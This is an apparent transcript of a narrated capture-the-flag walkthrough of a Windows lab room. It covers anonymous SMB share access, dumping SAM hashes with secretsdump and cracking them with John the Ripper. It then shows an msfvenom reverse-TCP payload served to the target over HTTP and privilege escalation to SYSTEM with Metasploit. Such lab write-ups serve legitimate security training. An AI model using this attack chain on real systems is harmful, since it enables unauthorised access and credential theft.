Hey, how are you doing? Today I'm doing the Moonshade room. It's a medium room. It's a Windows room. It involves a SAM file with a database containing password hash information for user accounts on the system. It's recommended for practicing cracking passwords of users on the system, gathering information and performing privilege escalation attacks by exploiting a vulnerable service running. Okay, so we've got our machine running. The IP is there. And we've got the VPN connected. So let's get started. So start off with a Rust scan. Okay, so we're going to do a Rust scan. So we'll do Rust, and we're going to put the IP in here. Copy the IP, and we'll run that. And we can see ports open 135, 139, 445, 3389. So we've got RDP. It's a Windows machine. We've got SMB ports 139, 445, 7680. I'm not sure what that is. So we'll wait till that finishes. Straight away, because we know we've got port 139 and 445 open, we can open a new terminal and we can explore the SMB. So we can do SMB client, and we can do a -L. This will show us all the shares, and we'll copy the IP. And you don't need a password. And there we go. We can see we've got admin, remote admin, C, IPC, reg backup. So we've got a registry backup here, and users. So we can have a look at some of those shares. So we'll be there. And there we go. So if we do it ls, you can see we've got administrator, default, and desktop.ini. So we can go into administrator, see what we've got in there. Shares, desktop. So if we go to desktop, we'll look at that, and there we go. We've got a backup there. So let's start looking at some of the questions. I think the first question is to do with the backup. What is the date of the registry backup shared with SMB? So we've got the first question already. It's there. The date's the 3rd of the 12th, 2024. The next question is, what is the username of the user having a UID of 1001? So what we can do is, let's have a look at that backup. So we'll go CD backup. Let's have a look and see what's in there. And we've got the SAM file and security file and the system file. So let's get the SAM file. Download it to my machine, and the system file, we can use them to try and get the password hash for the users and the users on the machine. So we're going to get the system file, get system file, and it should be downloaded to the machine hopefully. Okay, so now we should be able to exit out of there. We can have a look at our Rust scan, see how it was going, an Nmap scan. And we can see we've got 135, 139, 445, which is SMB ports. It's a Windows 10 machine. 3389, so we've got remote desktop access. Got the computer name there. We've got other ports, but they're probably not important. And we can see it's a Windows machine and the computer name. Okay, so we've got all that information. So if we do an ls now, we should be able to see we've got the SAM file and the system file here. So we want to use these two files to try and get the password hashes. And you can use inpacket to get that, an inpacket script, Python script, secrets dump.py. So let's have a look at that. So if we go cd usr, okay, so that's where the impact is. We're doing ls. We've got secrets dump.py here. So if we do Python 3 and secrets dump.py, and we're going to do -sam, so we'll put our SAM file in there, root SAM file. Yep. So then we'll do system, as again it's in the root directory, system file, then we'll do local, and we'll save it to an output of sam_hash.text, and let that run, and there we go, we've got our password hashes here for Edward and Jacob, and administrator, password hashes there for each of them after this column. So what was the question? What is the username of the user having a UID of 1001? So we have a look. 1001, and it's Edward. Okay, the answer to that question is Edward. What is the password for user Edward? So we need to crack the passwords. Copy the password hash here. There's already one called hash in there, so I'll just remove that. Actually, now I can go back to root again, and we can go nano hash and paste our hash in there, and then control save it, control X to save it, and then we're going to use a program called name that hash to find out what kind of hash it is. So name that hash, which you can get from the repository when you get up your apps on Kali Linux. Just look for name that hash. So we're going to look at hash, and we can see most likely MD5 used for Linux shadow files. So we know it's not Linux, it's Windows. NTLM, and on Hashcat it's 1000. It's often used in Windows Active Directory, so you can use Hashcat or John the Ripper to crack it. Let's try John then. And we'll hash and NT, because it was NT for John here, John the Ripper. So we'll try that one. And there we go, it's found it straight away, Twilight. Next question. So we know it's, what is the password for the user Edward? It's Twilight. What is the name of the computer? We got that answer from our scan. The name of the computer is, computer name, desktop OS LFD87. There's the answer to that question. Okay, what is Edward's username at the company .hackviser.space? That's the next question. So because we got port 3389 open, which is RDP, we can RDP into the machine. So let's do that. So we'll do X. There's the command we need, and just got to put the IP in there. we'll copy our IP. There. It's port 3389. User Edward and Twilight. And we'll run it. And it says, do you trust the certificate? Certificate, yes. And we've got a connection to the target with RDP, remote desktop. We've got our Windows machine here. Okay, so now the next question says, what is Edward's username at the company.hackviser.space? So we'll open a command prompt. We can do system info. We can find all the information about the system. So we've got the host name, which is computer name. It's Windows 10 Pro. It's using 64-bit base PC architecture, one processor. Okay, that's all your system information, and we can use a command. We can use net user. See the users on the machine. We've got guest and Jacob, administrator, Edward, default account. So to find the answer to the question, we need to check the accounts registered in the computer. Get more detail on the accounts registered in the computer, which is another command you run, which is command key -list, and there we go. See the answer there, edward@company.hv. So the question was, what is Edward's username at the company.hackviser.space? And there's the answer. Company.hackviser.space. Edward@company.hv. Okay. Next question. It's the last question. What is the email address that Jacob uses in company.hv? So let's have a look and see if we can I'll just minimize that. Open up this, and let's have a look. What do we got? This PC. Let's go to all users on the machine, and we've got Jacob here on the desktop, and we have a file called email addresses here. We click on that. Oh, it says you don't have permission to open this file. See the owner to get permission. So we can't get the answer to that one without getting privilege escalation. So what we'll do next is close this. We need to get a connection to the target with Metasploit. So what we'll do is we'll generate a MSF Venom payload to get a shell, and then run the application on the target. Alright, so we'll minimize this, and we'll go to our terminal again, and we're going to MSF Venom. Doesn't matter what you call it, we'll just call it x.exe. Just need to change the IP address here to my VPN for Hackviser's IP address there, so 10.8.1.225. Need to put L port as well, so we'll do L. This is our listening port. and we'll just say 4242, and we saw it was with 64-bit operating system too, so we need to have Windows 64-bit. So we'll put times 64 in there. So there's your command to create your payload. It's going to be x.exe is the payload that's created. We've got our IP there, 10.8.1.225 and port 4242. So we'll run that and wait till it gets created. Okay, so if we have a look at ls now, we can see we've got our x.exe here. So now we're going to do start a Python server so we can upload it to the target. -m, and we'll just use port 8080. So we'll start the Python server running on 8080 so we can upload this to our target. We'll open a new terminal. We're going to start up Metasploit, so we'll do msf console.q. Wait for that to start. Okay, so now we're going to do going to use exploit multi-handler. This is to get our connection back from the target. So we'll use that. We need to set the payload to Windows and 64-bit, so we need 64 and interpreter and reverse underscore TCP. So that should be exactly the same as what we've got for the same here, Windows 64 Metaterpreter reverse TCP. All these details need to be the same in this part. So we'll set our payload. We'll set lhost to 10.8.1.225, which is the same as this up here. My VPN for Hackviser. And we'll set our L port 4242. So now we'll run the multi-handler. Okay, so I'll start reverse TCP handler on the IP address, on my IP address and the port 4242. Okay, so now we're going to upload our payload here, x.exe, executable file. We've got our Python server running on 8080. So now we go to our back here. We'll go to a browser, and we're going to put in http, and it'll be my IP address 10.8.1.225 and port 8080, and there we go. So we've got all the listing on my machine here. All we do is find the exe that I've just created, and there it is down the bottom, exe.x.exe. So we'll click on that one, and you can see, if you minimize this for a minute, it's found the file, get 200. So it's got a 200 codes, it means it's found it, so that's a good sign. So what do you want to do with this file? We'll say run it, and we'll run it. Now if we go back out of this and back to our multi-handler, we can see we have a connection, sending stage, and we have a session open. So So now if we do get UID, we can see where user Edward on the machine. So we can do a help command, and it shows all the commands you can use in Metasploit, in Metinterpreter. So we can try and do privilege escalation, which is what we want to do. So we can try that to start with. So we can do get system. Let's try get system. Previous escalation, get system operation failed. Pipe instances are busy, so you can't do that. Okay, so what we'll do is we're going to go out of this Metinterpreter shell back to Metasploit, and we're going to look for previous escalation exploits. So we'll do a Control Z and background the session. We're back to there. We can search for local exploit suggester. And there we go, so we're going to use this one. So we'll say use 0. And now if we go options, we see you need to set a session. And I think I'm on session 1, but if I do sessions command, it shows that there's my session there. So it's 1, ID's 1. So if we go set session 1, and we'll run it, and now it's collecting exploits for previous escalation. So just let that run. Hopefully we'll find one we can use. Now it's checking the exploits. Looks like it's found a few that it can use. Target appears to be vulnerable. Target appears to be vulnerable. We know we're running Windows 10 from our system information. We've got Windows 10 Pro, alright. Okay, it's finished now. We've got this one here, because it says Windows, these all say vulnerable, this one says Windows 10 build detected. That's more of a good sign. That one says this one. So let's try this one to start with. So we'll copy that. Oops. Copy this. And we're going to do we're going to use that exploit. And it's Windows 64, it's got the right payload already. We should go to set session 1. And we'll run it. It requires another option, lhost. So we do set lhost and 10.8.1.225, and now we'll run it. Target appears to be vulnerable. Yep, looks like it's working. Sleeping for 20 seconds. Enjoy the shell. There we go. Looks like we've got previous escalation. So now if we do get UID, and we can see we've got NT authority system, so we're root now. We have escalated our privileges. Okay, so the question was, what is the email address that Jacob uses as the company.hv? So we need to go to Jacob's desktop again, where we found that file that we couldn't open before. So we'll go back to our root directory, do an ls. You can see we've got users there, so we'll go users, do an ls, and we want to look at Jacob, so we'll do cd Jacob ls and desktop. That's where that file was. ls, and there we go, we've got our email addresses.txt file here. So let's do a cat and email addresses.txt, and there we go, there's the answer. So the answer is jacob.smith@company.hv. See you next time. Happy hacking.